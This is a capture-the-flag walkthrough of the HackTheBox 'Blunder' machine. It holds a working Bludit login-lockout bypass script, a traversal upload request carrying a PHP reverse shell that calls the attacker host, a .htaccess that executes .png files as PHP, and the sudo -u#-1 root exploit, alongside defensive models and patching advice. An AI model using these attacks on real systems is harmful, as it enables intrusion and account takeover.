Blunder 10.10.10.191
Persistence is very important. You should not give up unless you are forced to give up (Elon Musk)
Completed on 29 October 2020

Background

Blunder is a Linux machine from HackTheBox, a realistic box that requires exploiting known CVEs, intended for practising ethical hacking and penetration testing skills.
After basic enumeration, the only exposed service is a web application on port 80 built on the Bludit CMS. Directory brute-forcing with dirb finds a few hidden files, one of which contains a possible user name, "fergus", and an admin login page protected by a brute-force lockout.
A search shows that the lockout in this version of Bludit can be bypassed, which yields a working login to the admin panel. Uploading a PHP reverse shell through the image upload function succeeds, but the path the file is stored under cannot be reached. A second search turns up a CVE exploit for Bludit that abuses directory traversal in the upload handler (CVE-2019-16113); following it gives low-privilege access as the web server user.
Enumerating the system reveals a second, newer Bludit installation and its file-based user database, which holds an SHA-1 password hash for the user hugo. The hash is cracked with an online lookup tool and gives access to that account.
Enumerating again with linpeas shows that the installed sudo version has a known privilege-escalation vulnerability (CVE-2019-14287). Following the Exploit-DB instructions gives root.
Target Machine: 10.10.10.191
Attacker Machine: 10.10.14.16

Hacking Process Part 0 – Service Scanning

Quick Pre-scan

nmap -p- -T5 --min-rate=1000 10.10.10.191 -oG fkclai.nmap

Detailed Analysis

nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.191 -oN nmap-result.txt
Enumeration Strategy
Only port 80 is open, so the focus is on the web application and any known CVEs affecting it.

Hacking Process Part 1 – Enumeration

1.1 Enumerating the website

Using the following tools, one folder and two files are found: /admin/, /robots.txt and /todo.txt
  • gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,php
  • dirb http://10.10.10.191/ /usr/share/wordlists/dirb/common.txt -o dirb-191.result
  • gobuster dir -u 'http://10.10.10.191/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-191.result
  • python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u http://10.10.10.191/ -e jsp,txt -x 301,302,403,404 --simple-report=dirsearch-191.result
/robots.txt
/todo.txt
/admin/
The source code of the login portal shows that the site is built with Bludit CMS version 3.9.2, and /todo.txt hints at a user named fergus.

1.2 Get the website login

Brute forcing is not straightforward: the login form carries a CSRF token, and after 10 failed attempts my IP address is blocked. The next step is to search for known vulnerabilities in this Bludit version, which turns up a blog post describing a bypass of the lockout (CVE-2019-17240): Bludit counts failed logins per client IP, but takes the client IP from the X-Forwarded-For header whenever one is present, so a request that changes that header on every attempt never accumulates failures. The script below, based on that post, fetches a fresh CSRF token per attempt and uses the candidate password itself as the X-Forwarded-For value, which guarantees a different "IP" each time.
Using rockyou.txt as the password list fails, but a wordlist gathered from the site itself with cewl succeeds. (cewl prints its banner to stdout, which is why the first candidate tried in the output below is the banner line; it is harmless.)
#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []

# Read the candidate passwords, one per line (here the cewl output)
with open('password.txt', 'r') as pwd:
    for line in pwd:
        wordlist.append(line.rstrip())

# Append one final guess to the end of the list (carried over from the original PoC)
wordlist.append('adminadmin')

for password in wordlist:
    session = requests.Session()
    # A fresh GET yields a fresh CSRF token; the form rejects posts without a valid one
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Trying: {p}'.format(p = password))

    # Bludit identifies the client by X-Forwarded-For when present. Using the
    # password as the value gives every attempt a distinct "IP", so the
    # per-IP failure counter never reaches the lockout threshold.
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A successful login answers with a redirect to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
~/Documents/ctf/htb/linux/17-HTB-Blunder/exploit# cewl 10.10.10.191 > password.txt

~/Documents/ctf/htb/linux/17-HTB-Blunder/exploit# python3 exploit.py
[*] Trying: CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
[*] Trying: the
[*] Trying: Load
[*] Trying: Plugins
[*] Trying: and
.......
.....
....
...
[*] Trying: Letters
[*] Trying: probably
[*] Trying: best
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.
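The lockout bypass modelled in Python, as an added example (not the page's script and not Bludit's PHP): a per-IP failure counter that, like Bludit 3.9.2, trusts X-Forwarded-For unconditionally, beside a hardened lookup that only believes the header when the TCP peer is a configured reverse proxy. The limit of 10 failed attempts matches what was observed on the box; the proxy range 192.0.2.0/24, the attacker address and the rotating header values are constructed for the simulation.

```python
"""Added example: a model of Bludit 3.9.2's per-IP login lockout and a hardened
variant. Not the page's script and not Bludit's PHP. The limit of 10 failures
matches the box; the proxy range, attacker address and header values are
constructed for the simulation."""
import ipaddress
from collections import defaultdict

MAX_FAILURES = 10  # failed attempts allowed per client IP before blocking


class LoginThrottle:
    """Per-IP failed-login counter. trusted_proxies lists the networks whose
    X-Forwarded-For header the hardened lookup is allowed to believe."""

    def __init__(self, trusted_proxies=()):
        self.trusted_proxies = [ipaddress.ip_network(p) for p in trusted_proxies]
        self.failures = defaultdict(int)

    def client_ip_vulnerable(self, remote_addr, headers):
        # Bludit 3.9.2 behaviour: whatever the client puts in X-Forwarded-For
        # replaces the socket address, so the attacker chooses the counter key.
        return headers.get('X-Forwarded-For', remote_addr)

    def client_ip_hardened(self, remote_addr, headers):
        # Believe X-Forwarded-For only when the TCP peer is one of our reverse
        # proxies, take the last hop it appended, and require a valid address.
        peer = ipaddress.ip_address(remote_addr)
        if 'X-Forwarded-For' in headers and any(peer in net for net in self.trusted_proxies):
            candidate = headers['X-Forwarded-For'].split(',')[-1].strip()
            try:
                return str(ipaddress.ip_address(candidate))
            except ValueError:
                pass  # garbage in the header: fall back to the socket address
        return remote_addr

    def attempt(self, remote_addr, headers, password_ok, hardened):
        """One login attempt; returns 'blocked', 'ok' or 'failed'."""
        lookup = self.client_ip_hardened if hardened else self.client_ip_vulnerable
        ip = lookup(remote_addr, headers)
        if self.failures[ip] >= MAX_FAILURES:
            return 'blocked'
        if password_ok:
            self.failures[ip] = 0
            return 'ok'
        self.failures[ip] += 1
        return 'failed'


def simulate(hardened, attempts=20):
    """Send `attempts` wrong guesses from one attacker address, each carrying a
    fresh X-Forwarded-For value as exploit.py does, and return how many of them
    the server actually evaluated instead of rejecting as blocked."""
    throttle = LoginThrottle(trusted_proxies=['192.0.2.0/24'])  # constructed proxy range
    evaluated = 0
    for i in range(attempts):
        headers = {'X-Forwarded-For': 'guess%d' % i}  # the script uses the password here
        if throttle.attempt('10.10.14.16', headers, password_ok=False, hardened=hardened) != 'blocked':
            evaluated += 1
    return evaluated


if __name__ == '__main__':
    print('vulnerable lookup evaluated', simulate(hardened=False), 'of 20 attempts')
    print('hardened lookup evaluated', simulate(hardened=True), 'of 20 attempts')
```

With the vulnerable lookup all 20 guesses are evaluated; with the hardened one the eleventh and later are rejected, because the counter is keyed on the real socket address unless a known proxy supplied the header.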

Hacking Process Part 2 - Initial low privilege access

After logging in, enumerating the application shows an image upload function. A PHP reverse shell and a .htaccess file pass the client-side validation and upload successfully, but the path the files are stored under cannot be found.
Searching Exploit-DB turns up a CVE for Bludit 3.9.2 involving directory traversal in the upload handler (CVE-2019-16113). The PoC shows that the uuid field of the upload request, which is meant to select the page the image belongs to, is used in the destination path without sanitisation, so it controls where the uploaded file lands.

2.1 Get the www account access

Because the upload validation is only applied on the client side, Burp is used to modify the upload request (the filename value and the uuid field). With uuid set to ../../tmp, the PHP reverse shell and the .htaccess file land in bl-content/tmp/, a folder served by the web server. The .htaccess disables URL rewriting and makes Apache run .png files through the PHP handler, so with a listener waiting on 10.10.14.16:1234 (the values hard-coded in the shell) the reverse shell is triggered by requesting the uploaded file: http://10.10.10.191/bl-content/tmp/reverse.php (with that .htaccess in place, a file kept as reverse.png, as in the request below, executes the same way).
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.191/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1577569979961725874602175024
Content-Length: 11616
Connection: close
Cookie: BLUDIT-KEY=ngp0psekevm7je3hnrlhjmkj57

-----------------------------1577569979961725874602175024
Content-Disposition: form-data; name="images[]"; filename="reverse.png"
Content-Type: image/png
.....
.....
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
.....
.....
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.16'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
....
...
..
-----------------------------1577569979961725874602175024
Content-Disposition: form-data; name="uuid"

../../tmp
-----------------------------1577569979961725874602175024
Content-Disposition: form-data; name="tokenCSRF"

60f8752883482353d1ad20bbff841b4aa9668c71
-----------------------------1577569979961725874602175024--

# .htaccess file
RewriteEngine off
AddType application/x-httpd-php .png
Finally, initial access as the web server account is obtained.
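The traversal in the upload handler, as an added Python model (not Bludit's PHP and not the author's code): the vulnerable path construction beside a hardened one that validates the uuid, refuses dotfiles such as .htaccess, and confirms the resolved path stays under the upload base. The base directory /var/www/bludit/bl-content/uploads/pages and the 32-hex-character uuid format are assumptions made for the example.

```python
"""Added example: Python model of the upload-path bug in Bludit 3.9.2's
upload-images handler and a hardened version. Not Bludit's PHP and not the
author's code. UPLOAD_BASE and the 32-hex-character uuid format are
assumptions made for the example."""
import os
import re

UPLOAD_BASE = '/var/www/bludit/bl-content/uploads/pages'  # assumed location
UUID_RE = re.compile(r'[0-9a-f]{32}')
ALLOWED_EXT = {'png', 'jpg', 'jpeg', 'gif'}  # svg left out: it can carry script


def upload_path_vulnerable(uuid, filename):
    """The request's uuid field is joined straight into the directory path, so
    uuid='../../tmp' walks out of the uploads tree into bl-content/tmp."""
    return os.path.normpath(os.path.join(UPLOAD_BASE, uuid, filename))


def upload_path_hardened(uuid, filename):
    """Accept only a well-formed uuid and a plain, non-dot, image-named file,
    then confirm the resolved path is still inside UPLOAD_BASE. The extension
    check alone is what the .htaccess trick defeats, hence the dotfile rule;
    the directory should also be served with script execution disabled."""
    if not UUID_RE.fullmatch(uuid):
        raise ValueError('uuid is not a 32-character hex id')
    if filename != os.path.basename(filename) or filename.startswith('.'):
        raise ValueError('filename must be a plain name (no path, no dotfile such as .htaccess)')
    ext = filename.rsplit('.', 1)[-1].lower() if '.' in filename else ''
    if ext not in ALLOWED_EXT:
        raise ValueError('extension not allowed')
    target = os.path.normpath(os.path.join(UPLOAD_BASE, uuid, filename))
    if os.path.commonpath([UPLOAD_BASE, target]) != UPLOAD_BASE:
        raise ValueError('resolved path escapes the upload base')
    return target


def is_rejected(uuid, filename):
    """True when the hardened builder refuses the uuid/filename pair."""
    try:
        upload_path_hardened(uuid, filename)
    except ValueError:
        return True
    return False


if __name__ == '__main__':
    print('vulnerable:', upload_path_vulnerable('../../tmp', 'reverse.png'))
    print('vulnerable:', upload_path_vulnerable('../../tmp', '.htaccess'))
    for pair in (('../../tmp', 'reverse.png'), ('a1' * 16, '.htaccess'), ('a1' * 16, 'photo.png')):
        print('hardened rejects %r: %s' % (pair, is_rejected(*pair)))
```

The vulnerable builder happily returns /var/www/bludit/bl-content/tmp/reverse.png for the request shown above; the hardened one refuses the traversal, the .htaccess and any non-image name, and only then performs the path-containment check as a last line of defence.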

2.2 Get the user account access

Inspecting the file system shows that Bludit is configured to use its file-based database, and three password hashes are found in the users.php database of each of the two Bludit installations on the box. According to the official documentation on recovering the admin password, the hash is SHA-1 (Bludit stores sha1(password + salt), so an entry with an empty salt is a plain SHA-1 that lookup tables can reverse). An online tool reverses the hash for the user hugo: Password120.
Hugo has reused this password for his system account. Spawning a PTY shell allows the su command to be used, and a low-privilege user shell as hugo is obtained.
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ python -c "import pty;pty.spawn('/bin/bash');"
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
su hugo
Password: Password120
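To show what the online tool did, here is an added Python example (not from the page) that parses a users.php in Bludit's layout and tests candidate words against sha1(password + salt). The user entries, the salt and the passwords are constructed inline so the script runs offline; only the file layout and the hash construction follow Bludit.

```python
"""Added example, not from the page: parse a Bludit users.php and test
candidate passwords against Bludit's sha1(password + salt) scheme. The
entries, salt and passwords below are constructed so the script runs offline;
only the file layout and hash construction follow Bludit."""
import hashlib
import json


def bludit_hash(password, salt=''):
    """Bludit's password hash: SHA-1 over the password with the salt appended."""
    return hashlib.sha1((password + salt).encode('utf-8')).hexdigest()


def load_users_php(text):
    """users.php is JSON behind a one-line PHP guard; drop the guard and parse."""
    body = text.split('?>', 1)[1] if text.startswith('<?php') else text
    return json.loads(body)


def crack_users(users, candidates):
    """Map each user whose stored hash equals sha1(candidate + salt) to that
    candidate. With an empty salt the hash is a plain SHA-1 of the password,
    which is why an online lookup table worked for hugo on the box."""
    found = {}
    for name, entry in users.items():
        salt = entry.get('salt', '')
        for cand in candidates:
            if bludit_hash(cand, salt) == entry['password']:
                found[name] = cand
                break
    return found


# Constructed sample in the layout of bl-content/databases/users.php
SAMPLE_USERS_PHP = "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n" + json.dumps({
    'admin': {'nickname': 'Admin', 'role': 'admin',
              'password': bludit_hash('not-in-any-wordlist-7Qz', 'q7fz2c1m'), 'salt': 'q7fz2c1m'},
    'hugo': {'nickname': 'Hugo', 'role': 'author',
             'password': bludit_hash('Password120'), 'salt': ''},
}, indent=4)

# Constructed candidate list: a few cewl words from earlier plus extras
CANDIDATES = ['the', 'Load', 'Plugins', 'RolandDeschain', 'Password120']

if __name__ == '__main__':
    users = load_users_php(SAMPLE_USERS_PHP)
    for name, entry in users.items():
        print('%-6s salt=%-10r hash=%s' % (name, entry['salt'], entry['password']))
    print('cracked:', crack_users(users, CANDIDATES))
```

Only hugo's unsalted entry falls to the short list; the salted admin entry does not, even though the scheme is still just SHA-1, which is why a per-user salt matters when the hash function itself is fast.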

Hacking Process Part 3 - Privilege Escalation

linpeas.sh is downloaded to survey the environment for possible privilege-escalation paths on the host. The result flags the installed sudo version as one of them.
Searching Exploit-DB again identifies a CVE exploit for this sudo version (CVE-2019-14287). sudo -l shows that hugo may run /bin/bash as any user except root, the (ALL, !root) rule. sudo before 1.8.28 checks the requested run-as user against that exclusion but passes a uid of -1 (equivalently 4294967295) through to setresuid(2), where -1 means "leave unchanged"; since sudo itself already runs as uid 0, the resulting shell is root. Following the instructions, a root shell is obtained.
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:~$ sudo --version
sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1

hugo@blunder:/$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
Password: Password120
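An added Python model (not from the page and not sudo's source) of why the command works: the run-as id is resolved, checked against the (ALL, !root) exclusion, and then handed to a setresuid(2) whose "-1 means unchanged" semantics keep the process at uid 0. It also parses the sudo --version output above to flag affected builds. The passwd table is constructed for the example.

```python
"""Added example, not from the page and not sudo's source: a model of why
`sudo -u#-1 /bin/bash` yields root under a '(ALL, !root)' rule on sudo before
1.8.28 (CVE-2019-14287), plus a check of `sudo --version` output. The passwd
table is constructed."""
import re

UID_MAX = 0xFFFFFFFF  # (uid_t)-1 on Linux
PASSWD = {'root': 0, 'www-data': 33, 'hugo': 1001}  # constructed sample


def parse_runas(spec):
    """Resolve the -u argument: '#N' is a numeric uid, anything else a name.
    Masking to 32 bits makes -1 and 4294967295 the same value, as uid_t does."""
    if spec.startswith('#'):
        return int(spec[1:]) & UID_MAX
    return PASSWD[spec]


def policy_allows(runas_uid):
    """'(ALL, !root)': any run-as user except uid 0. UID_MAX is not 0, so
    the exclusion does not catch it."""
    return runas_uid != 0


def setresuid_model(current_uid, requested_uid):
    """setresuid(2) treats a uid of (uid_t)-1 as 'leave this id unchanged'."""
    return current_uid if requested_uid == UID_MAX else requested_uid


def effective_uid_after_sudo(spec, fixed=False):
    """Uid of the spawned shell, or None if sudo refuses. sudo is setuid root,
    so the process is uid 0 when it calls setresuid. fixed=True adds the
    1.8.28 check that rejects -1 / UID_MAX as a run-as id."""
    uid = parse_runas(spec)
    if fixed and uid == UID_MAX:
        return None
    if not policy_allows(uid):
        return None
    return setresuid_model(0, uid)


def sudo_is_affected(version_output):
    """True when `sudo --version` reports a release before 1.8.28."""
    m = re.search(r'Sudo version (\d+)\.(\d+)\.(\d+)', version_output)
    if not m:
        raise ValueError('no sudo version line found')
    return tuple(int(x) for x in m.groups()) < (1, 8, 28)


if __name__ == '__main__':
    for spec in ('root', 'www-data', '#-1', '#4294967295'):
        print('%-12s vulnerable -> %s  fixed -> %s' % (
            spec, effective_uid_after_sudo(spec), effective_uid_after_sudo(spec, fixed=True)))
    print('1.8.25p1 affected:', sudo_is_affected('Sudo version 1.8.25p1'))
```

Under the vulnerable model -u root is refused, -u www-data gives uid 33, and -u#-1 gives uid 0; with the 1.8.28 check the -1 case is refused outright. The version check is the quick triage step to run whenever sudo -l shows a rule with an explicit !root exclusion.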

Recommendation

Missing patches are very common in real-life systems; keeping them up to date (here Bludit, and sudo, which fixed CVE-2019-14287 in 1.8.28) would have closed every hole used on this box. Beyond patching: trust X-Forwarded-For only when it comes from a known reverse proxy, do not let upload directories execute scripts or honour .htaccess overrides, and never reuse a CMS password for a system account.
